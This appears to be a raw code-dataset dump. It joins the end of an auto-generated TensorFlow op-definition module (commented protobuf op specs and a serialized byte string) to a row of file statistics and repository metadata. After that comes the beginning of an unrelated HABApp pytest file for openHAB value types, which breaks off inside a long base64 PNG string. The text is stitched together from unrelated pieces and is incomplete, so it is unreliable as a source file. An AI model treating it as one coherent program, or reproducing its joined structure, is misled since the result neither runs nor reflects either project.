# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# is_stateful: true
# }
# op {
# name: "PartitionedCall"
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "config"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "config_proto"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "executor_type"
# type: "string"
# default_value {
# s: ""
# }
# }
# }
# op {
# name: "RemoteCall"
# input_arg {
# name: "target"
# type: DT_STRING
# }
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "f"
# type: "func"
# }
# is_stateful: true
# }
# op {
# name: "StatefulPartitionedCall"
# input_arg {
# name: "args"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "config"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "config_proto"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "executor_type"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "StatelessIf"
# input_arg {
# name: "cond"
# type_attr: "Tcond"
# }
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tcond"
# type: "type"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "then_branch"
# type: "func"
# }
# attr {
# name: "else_branch"
# type: "func"
# }
# }
# op {
# name: "StatelessWhile"
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "cond"
# type: "func"
# }
# attr {
# name: "body"
# type: "func"
# }
# }
# op {
# name: "SymbolicGradient"
# input_arg {
# name: "input"
# type_list_attr: "Tin"
# }
# output_arg {
# name: "output"
# type_list_attr: "Tout"
# }
# attr {
# name: "Tin"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Tout"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "f"
# type: "func"
# }
# }
# op {
# name: "While"
# input_arg {
# name: "input"
# type_list_attr: "T"
# }
# output_arg {
# name: "output"
# type_list_attr: "T"
# }
# attr {
# name: "T"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "cond"
# type: "func"
# }
# attr {
# name: "body"
# type: "func"
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# default_value {
# list {
# }
# }
# }
# attr {
# name: "parallel_iterations"
# type: "int"
# default_value {
# i: 10
# }
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\242\001\n\004Case\022\020\n\014branch_index\030\003\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\032\n\010branches\022\nlist(func)(\0010\001\" \n\routput_shapes\022\013list(shape)\032\002\n\000\210\001\001\n;\n\tFakeParam\032\017\n\006output\"\005dtype\"\r\n\005dtype\022\004type\"\016\n\005shape\022\005shape\n`\n\003For\022\t\n\005start\030\003\022\t\n\005limit\030\003\022\t\n\005delta\030\003\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004body\022\004func\n\272\001\n\002If\022\r\n\004cond\"\005Tcond\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\r\n\005Tcond\022\004type\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\023\n\013then_branch\022\004func\"\023\n\013else_branch\022\004func\" \n\routput_shapes\022\013list(shape)\032\002\n\000\210\001\001\n\263\001\n\017PartitionedCall\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\t\n\001f\022\004func\"\024\n\006config\022\006string\032\002\022\000\"\032\n\014config_proto\022\006string\032\002\022\000\"\033\n\rexecutor_type\022\006string\032\002\022\000\nr\n\nRemoteCall\022\n\n\006target\030\007\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\025\n\003Tin\022\nlist(type)(\0010\001\"\026\n\004Tout\022\nlist(type)(\0010\001\"\t\n\001f\022\004func\210\001\001\n\276\001\n\027StatefulPartitionedCall\022\013\n\004args2\003Tin\032\016\n\006output2\004Tout\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\t\n\001f\022\004func\"\024\n\006config\022\006string\032\002\022\000\"\032\n\014config_proto\022\006string\032\002\022\000\"\033\n\rexecutor_type\022\006string\032\002\022\000\210\001\001\n\236\001\n\013StatelessIf\022\r\n\004cond\"\005Tcond\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\r\n\005Tcond\022\004type\"\023\n\003Tin\022\nlist(type)(\001\"\024\n\004Tout\022\nlist(type)(\001\"\023\n\013then_branch\022\004func\"\023\n\013else_branch\022\004func\nX\n\016StatelessWhile\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004cond\022\004func\"\014\n\004body\022\004func\nj\n\020SymbolicGradient\022\014\n\005input2\003Tin\032\016\n\006output2\004Tout\"\025\n\003Tin\022\nlist(type)(\0010\001\"\026\n\004Tout\022\nlist(type)(\0010\001\"\t\n\001f\022\004func\n\224\001\n\005While\022\n\n\005input2\001T\032\013\n\006output2\001T\"\021\n\001T\022\nlist(type)(\001\"\014\n\004cond\022\004func\"\014\n\004body\022\004func\" \n\routput_shapes\022\013list(shape)\032\002\n\000\"\036\n\023parallel_iterations\022\003int\032\002\030\n\210\001\001")
| 38.089692 | 2,788 | 0.663252 | 7,698 | 56,906 | 4.630813 | 0.053131 | 0.033326 | 0.010604 | 0.011109 | 0.850511 | 0.83079 | 0.815558 | 0.795837 | 0.769636 | 0.761081 | 0 | 0.025932 | 0.218659 | 56,906 | 1,493 | 2,789 | 38.115204 | 0.775814 | 0.306505 | 0 | 0.702983 | 1 | 0.010376 | 0.129958 | 0.043822 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044099 | false | 0.014267 | 0.024643 | 0.014267 | 0.14786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
6b3de89a0b8b5ab6133219c9fa755c1383318fd3 | 62,075 | py | Python | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 44 | 2018-12-13T08:46:44.000Z | 2022-03-07T03:23:21.000Z | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 156 | 2019-03-02T20:53:31.000Z | 2022-03-23T13:13:58.000Z | tests/test_openhab/test_values.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 18 | 2019-03-08T07:13:21.000Z | 2022-03-22T19:52:31.000Z | import pytest
from HABApp.openhab.definitions import HSBValue, OnOffValue, OpenClosedValue, PercentValue, QuantityValue, RawValue, \
UpDownValue
from HABApp.openhab.definitions import ITEM_DIMENSIONS
@pytest.mark.parametrize(
"cls,values", [
(UpDownValue, (UpDownValue.DOWN, UpDownValue.UP)),
(OnOffValue, (OnOffValue.ON, OnOffValue.OFF)),
(OpenClosedValue, (OpenClosedValue.OPEN, OpenClosedValue.CLOSED)),
]
)
def test_val_same_type(cls, values):
for val in values:
assert cls(val).value == val
@pytest.mark.parametrize(
"cls,values", [
(PercentValue, (('0', 0.0), ('5', 5.0), ('55.5', 55.5), ('100.0', 100), )),
(HSBValue, (
('0,0,0', (0, 0, 0)), ('5,0,0', (5, 0, 0)),
('100.0,0,360', (100, 0, 360)), ('0,100.0,180', (0, 100, 180))
)),
]
)
def test_val_convert(cls, values):
for val in values:
assert cls(val[0]).value == val[1]
def test_quantity_value():
unit_of_dimension = {
'Length': 'm', 'Temperature': '°C', 'Pressure': 'hPa', 'Speed': 'km/h', 'Intensity': 'W/m²', 'Angle': '°',
'Dimensionless': '',
}
for dimension in ITEM_DIMENSIONS:
for val in (-103.3, -3, 0, 0.33535, 5, 55.5, 105.5):
unit = unit_of_dimension[dimension]
v = QuantityValue(f'{val} {unit}')
assert v.value == val
assert v.unit == unit
def test_raw_type_png():
data = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPwAAAD8CAYAAABTq8lnAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFIGlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDAgNzkuMTYwNDUxLCAyMDE3LzA1LzA2LTAxOjA4OjIxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxOCAoTWFjaW50b3NoKSIgeG1wOkNyZWF0ZURhdGU9IjIwMTgtMDgtMTdUMTQ6MTc6NTAtMDQ6MDAiIHhtcDpNb2RpZnlEYXRlPSIyMDE4LTA4LTIwVDA3OjM4OjIzLTA0OjAwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDE4LTA4LTIwVDA3OjM4OjIzLTA0OjAwIiBkYzpmb3JtYXQ9ImltYWdlL3BuZyIgcGhvdG9zaG9wOkNvbG9yTW9kZT0iMyIgcGhvdG9zaG9wOklDQ1Byb2ZpbGU9InNSR0IgSUVDNjE5NjYtMi4xIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjE5OTJjOTljLTYx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